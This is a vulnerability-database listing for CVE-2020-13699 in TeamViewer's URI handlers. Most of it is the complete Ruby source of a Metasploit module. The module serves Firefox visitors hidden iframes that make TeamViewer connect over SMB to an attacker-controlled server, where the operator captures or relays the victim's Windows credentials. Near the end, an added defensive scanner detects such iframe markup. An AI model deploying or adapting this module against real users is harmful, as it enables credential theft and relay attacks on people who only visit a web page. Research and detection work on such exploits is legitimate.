TeamViewer Unquoted URI Handler SMB Redirect

Published: 31 Aug 2024 00:00:00
Reported by: h00die, Jeffrey Hofmann, metasploit.com
Type: packetstorm
Source: packetstormsecurity.com
Views: 172

TeamViewer Unquoted URI Handler SMB Redirect. Exploits unquoted parameter call in TeamViewer URI handler to create SMB connection to attacker controlled I

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| ATTACKERKB | CVE-2020-13699 | 29 Jul 2020 00:00 | attackerkb |
| Circl | CVE-2020-13699 | 8 Aug 2020 21:10 | circl |
| CVE | CVE-2020-13699 | 29 Jul 2020 15:36 | cve |
| Cvelist | CVE-2020-13699 | 29 Jul 2020 15:36 | cvelist |
| Metasploit | TeamViewer Unquoted URI Handler SMB Redirect | 19 Aug 2020 17:40 | metasploit |
| NCSC | Vulnerability fixed in TeamViewer | 11 Aug 2020 00:00 | ncsc |
| NVD | CVE-2020-13699 | 29 Jul 2020 16:15 | nvd |
| OpenVAS | TeamViewer Unqoted URI Handler Vulnerability (CVE 2020-13699) - Windows | 16 Mar 2021 00:00 | openvas |
| OSV | CVE-2020-13699 | 29 Jul 2020 16:15 | osv |
| Prion | Cross site request forgery (csrf) | 29 Jul 2020 16:15 | prion |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',
        'Description' => %q{
          This module exploits an unquoted parameter call within the Teamviewer
          URI handler to create an SMB connection to an attacker controlled IP.
          TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,
          12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are
          vulnerable.
          Only Firefox can be exploited by this vulnerability, as all other
          browsers encode the space after 'play' and before the SMB location,
          preventing successful exploitation.
          Teamviewer 15.4.4445, and 8.0.16642 were successfully tested against.
        },
        'Author' => [
          'Jeffrey Hofmann <[email protected]>', # Vuln discovery, PoC, etc
          'h00die' # msf module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
          [ 'CVE', '2020-13699' ],
          [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
        OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
        OptEnum.new('URI_HANDLER', [
          true, 'TeamViewer URI Handler', 'teamviewer10', [
            'teamviewer10',
            'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
            'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
          ]
        ])
      ]
    )
  end

  def html_content
    # For some reason, tends to work best when double iframes. Single will pop up the 'open app' message, but tends to not connect.
    %(
    <html>
    <head></head>
    <body>
    <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
    <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
    </body>
    </html>
    )
  end

  def on_request_uri(cli, req)
    print_status("Request received for: #{req.uri}")

    ua = req.headers['User-Agent'].to_s

    unless ua.include?('Firefox')
      print_error('Target is not Firefox')
      return
    end

    print_status("Sending TeamViewer Link to #{ua}...")
    send_response_html(cli, html_content)
  end

  def run
    print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")
    exploit
  end
end
```
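A defender-side check for the markup this module serves, as an added example that is not part of the original module: it scans HTML for `src`/`href` values that hand a TeamViewer URI handler a whitespace-separated command-line option, and reports any UNC host along with whether the space arrives unencoded. The scheme list is taken from the module's `URI_HANDLER` option; the function and struct names, the regexes and the sample page are assumptions constructed for illustration.

```ruby
# Added example (not from the Metasploit module). Scheme list copied from the
# module's URI_HANDLER option; names, regexes and sample data are assumptions.
TV_SCHEMES = %w[
  teamviewer10 teamviewer8 teamviewerapi tvchat1 tvcontrol1 tvfiletransfer1
  tvjoinv8 tvpresent1 tvsendfile1 tvsqcustomer1 tvsqsupport1 tvvideocall1 tvvpn1
].freeze

ATTR_RE    = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)')/i
HANDLER_RE = /\A(#{Regexp.union(TV_SCHEMES).source}):(.*)\z/im

Finding = Struct.new(:scheme, :option, :unc_host, :raw_space)

# Returns one Finding per src/href value that passes a TeamViewer URI handler
# a whitespace-separated command-line option.
def scan_html(html)
  html.scan(ATTR_RE).filter_map do |dq, sq|
    m = HANDLER_RE.match((dq || sq).strip) or next
    rest = m[2]
    # Decode ASCII percent-escapes so encoded variants are reported too.
    decoded = rest.gsub(/%([0-7]\h)/) { Regexp.last_match(1).hex.chr }
    option = decoded[/\s(-{1,2}[A-Za-z][\w-]*)/, 1] or next
    Finding.new(
      m[1].downcase,
      option,
      decoded[/\\\\([^\\\/\s]+)/, 1], # host part of a UNC path, if present
      rest.match?(/\s-/)              # true when the space is not encoded
    )
  end
end

# Constructed sample page; 192.0.2.10 is a documentation-range address.
SAMPLE = <<~'HTML'
  <iframe src="teamviewer10: --play \\192.0.2.10\share\config.tvs"></iframe>
  <a href='tvjoinv8:%20--play%20\\192.0.2.10\share\a.tvs'>join</a>
  <a href="tvchat1:constructed-benign-value">chat</a>
  <a href="https://example.com/?q=%20--play">search</a>
HTML

scan_html(SAMPLE).each do |f|
  puts "#{f.scheme}: option=#{f.option} unc_host=#{f.unc_host.inspect} raw_space=#{f.raw_space}"
end
```

The `raw_space` field separates the unencoded form, which the module description says only Firefox passes through, from the percent-encoded form that other browsers produce.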


31 Aug 2024 00:00 (Current)
Vulners AI Score: 7.1 (High risk)
CVSS 2: 6.8
CVSS 3.1: 8.8
EPSS: 0.72886